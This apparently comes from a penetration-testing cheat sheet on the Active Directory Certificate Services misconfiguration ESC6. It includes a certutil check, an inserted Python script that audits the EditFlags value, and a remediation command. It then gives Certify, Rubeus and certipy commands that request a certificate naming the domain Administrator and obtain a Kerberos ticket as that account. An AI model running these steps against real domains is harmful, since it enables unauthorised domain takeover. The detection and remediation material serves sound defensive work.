ESC6
ESC6 permits the inclusion of user-defined values in the subject alternative name
of any request.
Verify the permission:
certutil -config "CA_HOST\CA_NAME" -getreg "policy\EditFlags"
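One way to turn that output into a pass/fail check, as an added example that is not part of the original page: it parses the text printed by the certutil command above and tests the EDITF_ATTRIBUTESUBJECTALTNAME2 bit (0x00040000), the EditFlags bit behind ESC6. The sample output, the function names and the subset of flag names are constructed for illustration.

```python
import re

# Subset of EditFlags bits as defined in the Windows SDK header certsrv.h.
EDITF_FLAGS = {
    0x00000002: "EDITF_REQUESTEXTENSIONLIST",
    0x00000004: "EDITF_DISABLEEXTENSIONLIST",
    0x00000008: "EDITF_ADDOLDKEYUSAGE",
    0x00000040: "EDITF_BASICCONSTRAINTSCRITICAL",
    0x00000100: "EDITF_ENABLEAKIKEYID",
    0x00010000: "EDITF_ENABLEDEFAULTSMIME",
    0x00040000: "EDITF_ATTRIBUTESUBJECTALTNAME2",
    0x00100000: "EDITF_ENABLECHASECLIENTDC",
}
SAN2 = 0x00040000  # requester-supplied SAN attribute is honoured when set

# certutil prints the DWORD in hex, usually followed by decimal in parentheses.
_VALUE_RE = re.compile(
    r"EditFlags\s+REG_DWORD\s*=\s*([0-9A-Fa-f]+)(?:\s*\((\d+)\))?")

def parse_editflags(certutil_output):
    """Return the EditFlags DWORD from `certutil -getreg` text, or None."""
    m = _VALUE_RE.search(certutil_output)
    if not m:
        return None
    value = int(m.group(1), 16)
    if m.group(2) is not None and value != int(m.group(2)):
        raise ValueError("hex and decimal renderings disagree")
    return value

def audit_esc6(certutil_output):
    """Decode the flags and report whether the CA is exposed to ESC6."""
    value = parse_editflags(certutil_output)
    if value is None:
        return {"status": "unknown", "value": None, "flags": []}
    names = [name for bit, name in sorted(EDITF_FLAGS.items()) if value & bit]
    status = "exposed" if value & SAN2 else "ok"
    return {"status": status, "value": value, "flags": names}

# Constructed sample output, not captured from a real CA.
SAMPLE_EXPOSED = """
  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
CertUtil: -getreg command completed successfully.
"""
SAMPLE_DEFAULT = "  EditFlags REG_DWORD = 11014e (1114446)\n"

if __name__ == "__main__":
    for text in (SAMPLE_EXPOSED, SAMPLE_DEFAULT):
        print(audit_esc6(text))
```

When the result is "exposed", the flag can be cleared with certutil -config "CA_HOST\CA_NAME" -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, followed by a restart of the CertSvc service.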
Windows
Request a certificate abusing ESC6
PS /home/bobbuilder> .\Certify.exe request /ca:<ca_name> /template:<template_name> /altname:Administrator
Convert certificate to PFX
Get a TGT as the Administrator Account
PS /home/bobbuilder> .\Rubeus.exe asktgt /user:administrator /certificate:cert.pfx
Linux
Certificate Request with an alternative UPN
bob$ certipy req -username 'user1@minions.com' -password 'password1' -ca <ca_name> -target <ip> -template <template_name> -upn administrator@minions.com